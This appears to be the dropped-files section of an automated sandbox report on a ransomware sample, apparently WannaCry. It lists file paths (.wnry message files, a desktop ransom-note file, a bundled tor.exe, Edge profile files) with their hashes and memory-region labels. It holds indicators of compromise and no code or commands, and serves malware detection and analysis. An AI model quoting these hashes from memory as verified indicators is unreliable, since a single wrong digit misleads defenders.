SHA512 0118089ce0100234b2c8e8f36cbfd99fcb7009bc5f43a59b2b7de539327837eebaa9b2a508c0486f190bd343ef76ee5208d48ff7d7f8b6285087e0492a3f31f3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 206702161f94c5cd39fadd03f4014d98
SHA1 bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA256 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA512 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 d31563a1f7260e5c1d90945d4ff1c8a2
SHA1 cd1eac9010982c9eec97c31765f4e52bf5ea2f0d
SHA256 e1ec4dbb6f521639a502424a9e09b3447f2c3892c74cb08259211097a114b792
SHA512 e5b89a840f288045846c05b1fd3b2191fe4a30424cb897eb249926999c4cbbc1f550684e9e55d365f5ab3eaf04f8fd841b7a87ddc59d47f66adf71f094e1851b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 21f6f1ec0bc29b8ac7cbd15f56f7bbdb
SHA1 3ba3792532a51f2c3ffeaab086f13e902184f235
SHA256 1b0af2cc52163c7b14d70c885457266edc8081db53b5b6ed8b70bda6203450f2
SHA512 b98f9405550d16045f3d711d946b51adab29df48c7b078a7b1568b9f36cc8f0c01963d26bd34bd73ec42ccc200326320e07fcf6447fa87200c7369dd7695923f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 fc9b6c7774353873004260c3fc120017
SHA1 b2b597332ba80445aa637e38a14d8f37595783e8
SHA256 f2fb4f3dd6ca3ef0e3cac363df866a2437127e970cb91f3424855cba48304b80
SHA512 7b102c303864011b381d54bc57b25dc8bb8221ea566c4a9d0df1ecb19953167f6aa2e6e9a5b5df897d245cd304e357d508736870289f3f3eb1773b966d0bced4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 285252a2f6327d41eab203dc2f402c67
SHA1 acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6
SHA256 5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026
SHA512 11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001c

MD5 84c82835a5d21bbcf75a61706d8ab549
SHA1 5ff465afaabcbf0150d1a3ab2c2e74f3a4426467
SHA256 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa
SHA512 90723a50c20ba3643d625595fd6be8dcf88d70ff7f4b4719a88f055d5b3149a4231018ea30d375171507a147e59f73478c0c27948590794554d031e7d54b7244

C:\Users\Admin\Downloads\msg\m_finnish.wnry

MD5 35c2f97eea8819b1caebd23fee732d8f
SHA1 e354d1cc43d6a39d9732adea5d3b0f57284255d2
SHA256 1adfee058b98206cb4fbe1a46d3ed62a11e1dee2c7ff521c1eef7c706e6a700e
SHA512 908149a6f5238fcccd86f7c374986d486590a0991ef5243f0cd9e63cc8e208158a9a812665233b09c3a478233d30f21e3d355b94f36b83644795556f147345bf

C:\Users\Admin\Downloads\msg\m_filipino.wnry

MD5 08b9e69b57e4c9b966664f8e1c27ab09
SHA1 2da1025bbbfb3cd308070765fc0893a48e5a85fa
SHA256 d8489f8c16318e524b45de8b35d7e2c3cd8ed4821c136f12f5ef3c9fc3321324
SHA512 966b5ed68be6b5ccd46e0de1fa868cfe5432d9bf82e1e2f6eb99b2aef3c92f88d96f4f4eec5e16381b9c6db80a68071e7124ca1474d664bdd77e1817ec600cb4

memory/5808-1304-0x0000000010000000-0x0000000010010000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 915f1394ad9606882703daa2fdbac9cb
SHA1 ba181d61f5b8ec63957b10c3a57ee5d4c2dfc3a9
SHA256 0eee6d9171a5d7b409087563764847e529421cfd66051b0561143d8cb6407fac
SHA512 e473404cb282ba8100a21d1be49126bcd07bcf4e47e4d43bddd47fd94f4cb99fa84a8d6ca08bf5561804339cad92de79164573de57616fc48333065afd8c5b9b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe593d1f.TMP

MD5 0af36ee83be8281ef0c9809892d7fda5
SHA1 19081f5998209d77ac77f05c8f1925be873fc8ad
SHA256 8de33f20cfb6c6beb7162ea5d92da9a0d277f8506442bbf1ff7d183b94404db5
SHA512 a62505fe29d83c4904e8a554df50a8bbd8365d5e88c42b5dca8fbf8a6d9dae040e6c6e7b7e4bbf6df8bf41b6ec76876a8cb39e062eef2a92bd3928f200999fc9

C:\Users\Admin\Desktop\@[email protected]

MD5 7bf2b57f2a205768755c07f238fb32cc
SHA1 45356a9dd616ed7161a3b9192e2f318d0ab5ad10
SHA256 b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25
SHA512 91a39e919296cb5c6eccba710b780519d90035175aa460ec6dbe631324e5e5753bd8d87f395b5481bcd7e1ad623b31a34382d81faae06bef60ec28b49c3122a9

C:\Users\Admin\Downloads\@[email protected]

MD5 7a2726bb6e6a79fb1d092b7f2b688af0
SHA1 b3effadce8b76aee8cd6ce2eccbb8701797468a2
SHA256 840ab19c411c918ea3e7526d0df4b9cb002de5ea15e854389285df0d1ea9a8e5
SHA512 4e107f661e6be183659fdd265e131a64cce2112d842226305f6b111d00109a970fda0b5abfb1daa9f64428e445e3b472332392435707c9aebbfe94c480c72e54

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 784ff0d3f1e29acba3253e6572055fa9
SHA1 dc887c4921ace72760b97d30de82f2a830baf890
SHA256 a8919ce9ed5344666235bae09ea54634f4b59f46186c6299c57d4714000dec57
SHA512 32ee74264ecb81d1213b994dd38c5a0fd299afc6dffbd536eba1f6662279a9884debe61e855312c90c2b84b91da28fd20a757cc362d4e207400af4d9a697778d

C:\Users\Admin\AppData\Roaming\@[email protected]

MD5 90788922557cf3d1b2557bbef6887b87
SHA1 0c93138539752df012184e0338dea7626a468913
SHA256 abb94809298b8b574115518cc386604f3593e3499b38ff04401a5ce45c2f855f
SHA512 d92cb237b2e427d7b867d94dd220358570fc0eb936b3fb664ec509d3a63ff33c3727d6ac319ba5071c8cd7e672c3187f4a60741b2e23262ae3df22a8995493d1

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 0ef26930e239597d5ac9634844c5adce
SHA1 1db656684a49bb9046b12f5c64dc08ebaaf1eb12
SHA256 56fe09e53fd2c891cb18b855c5dab57d8366e931dccb267f7905bf9b25bf099f
SHA512 447831b3fcce0f1df45b15214d16e27fc591118565c826e857baa644a775030f217cc0b58181a6f91d29aa11c9b80e5e11ef758f089c5ab1035391677ed9b8fb

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 6806d9af06347331b82a44912390a358
SHA1 e4207527ef524712283277f72bf230cafabf75fd
SHA256 e32a338f5844d4c96c45c1a463035c4247357b4d3eabc5c858b31f3ab04885aa
SHA512 045ecaeb1f77f9ef5b6f9b46c64378a5d7a82b4d92eaca5b29f43290e16097594a723486b2bd4710e2cdd1e02fbab0e62cdcf2cd8a900acbf2d62bea33544442

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 195a87e854474c7fab9676262bd4b2dc
SHA1 40d5b0fac03cc03ad1325dcc3b446c0969e2aad6
SHA256 e684139666b3e5c41e573b5d4defc92b3a566e9173d3149585546fbbb1ee296d
SHA512 8b58cffc4e95fa5ea52dbaac39c31e5601e73a4f7d40d6012d85bb538a3434eb5477f4244f571b5340e3580f0c33d66923435c0c1e187d4301dfc1cfac2e2a8d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 a4bcedce2a166ab0edc3d88569ffbde2
SHA1 3bda6be3d0da8e1c680042f59ad95d5768c61947
SHA256 5588ed4c4b74dcfcae97e35a1fc5c6d8b6e7c05ac96b52077a76be73d016b4c2
SHA512 23d13c6aabbca735dae38a5954a85d1a1ba8d111c34af239f190c0c940d72a75fd2c17bef797ff140eca39d5f6904388e8ae6456e1dbc230e2a98ca4d1e31e4c

C:\Users\Default\Desktop\@[email protected]

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\Downloads\TaskData\Tor\tor.exe

MD5 fe7eb54691ad6e6af77f8a9a0b6de26d
SHA1 53912d33bec3375153b7e4e68b78d66dab62671a
SHA256 e48673680746fbe027e8982f62a83c298d6fb46ad9243de8e79b7e5a24dcd4eb
SHA512 8ac6dc5bb016afc869fcbb713f6a14d3692e866b94f4f1ee83b09a7506a8cb58768bd47e081cf6e97b2dacf9f9a6a8ca240d7d20d0b67dbd33238cc861deae8f

memory/1228-2832-0x0000000073BC0000-0x0000000073C42000-memory.dmp

memory/1228-2833-0x0000000073840000-0x0000000073A5C000-memory.dmp

memory/1228-2835-0x0000000073A60000-0x0000000073A82000-memory.dmp

memory/1228-2836-0x0000000000F30000-0x000000000122E000-memory.dmp

memory/1228-2834-0x0000000073A90000-0x0000000073B12000-memory.dmp

C:\Users\Admin\AppData\Roaming\tor\cached-microdescs.new

MD5 e1a6265ad1ca7ea4090a80192b18a182
SHA1 68f845b31c3a7ea8ce8be2c589ba5856948e0aab
SHA256 1618b1c2024e8287f887ba05bf6152fbe65927ea38f56371c4dd56ed8fbcd25a
SHA512 cbd6d4bdff0ca27e2acf2d19e86e8ecf6f46cbbf108e2c2d4642a5fd57b24c31506b716ec622f73812369dfe2798e41afb922e1439ec008d1f27690a04e66813

memory/1228-2880-0x0000000073A60000-0x0000000073A82000-memory.dmp

memory/1228-2876-0x0000000073BC0000-0x0000000073C42000-memory.dmp

memory/1228-2879-0x0000000073A90000-0x0000000073B12000-memory.dmp

memory/1228-2881-0x0000000073840000-0x0000000073A5C000-memory.dmp

memory/1228-2878-0x0000000073B20000-0x0000000073B3C000-memory.dmp

memory/1228-2877-0x0000000073B40000-0x0000000073BB7000-memory.dmp

memory/1228-2875-0x0000000000F30000-0x000000000122E000-memory.dmp